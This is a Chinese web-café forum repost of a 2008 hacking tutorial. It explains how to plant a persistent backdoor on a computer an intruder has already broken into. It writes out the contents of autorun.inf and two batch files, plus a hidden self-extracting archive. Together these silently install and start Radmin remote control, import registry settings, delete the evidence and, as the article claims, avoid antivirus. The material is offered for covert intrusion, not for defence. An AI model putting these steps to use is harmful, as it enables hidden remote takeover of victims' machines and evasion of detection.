天下网吧 >> 网吧天地 >> 网吧技术 >> 网吧安全 >> 正文

黑客技巧之入侵网站后全自动安装后门

2008-2-18黑客基地佚名

这里只需要你有上传的权限。

一共三个文件:1.Autorun.inf、2.Shell.bat、3.Hao.exe(自解压文件)。

思路:

全部放在C盘下。当肉鸡主人双击C盘时自动运行第一文件,第一文件带动运行第二文件,同时第二运行第三运行完可正常进入C盘。不会让人发觉。并且里面所带的批处理,会在最后把所有文件删除。此时,后门却已经装上去了(此法针对没有权限运行木马的入侵活动)。

制作:

[autorun] open=shell.bat,这个是autorun.inf @echo off hao.exe c:\windows\explorer c:\ del autorun.inf del rad.exe del shell.ba,这个是shell.bat hao.exe,里面包含admdll.dll、raddrv.dll、admin.reg、pchealthy.exe、r.bat五个文件(关键所在)r.bat——批处理做法 @echo off @pchealthy.exe /install /silence @regedit /s admin.reg @net start r_server @del admin.reg @del r.bat,其他四个就是Radmin的文件。这个大家都会,复制过来就行。

我们再来看自解压的处理。在解压路径里我们用 %systemroot%\system32,就是解压到系统目录里,并且“解压后运行”填上我们的r.bat文件。因为这里的文件比较多,比较隐蔽。解压模式我们选 “全部隐藏”,和 “覆盖所有文件”! 好了,一个不被杀毒软件所能查杀的好后门程序就成功制作出来了!

大家不要放在文件夹里压缩哦,要直接选上admdll.dll、raddrv.dll、admin.reg、pchealthy.exe、r.bat五个文件压缩,这样就行啦。

欢迎访问最专业的网吧论坛,无盘论坛,网吧经营,网咖管理,网吧专业论坛https://bbs.txwb.com

关注天下网吧微信,了解网吧网咖经营管理,安装维护:


本文来源:黑客基地 作者:佚名

声明
本文来源地址:0
声明:本站所发表的文章、评论及图片仅代表作者本人观点,与本站立场无关。若文章侵犯了您的相关权益,请及时与我们联系,我们会及时处理,感谢您对本站的支持!联系Email:support@txwb.com.,本站所有有注明来源为天下网吧或天下网吧论坛的原创作品,各位转载时请注明来源链接!
天下网吧·网吧天下
  • 本周热门
  • 本月热门
  • 阅读排行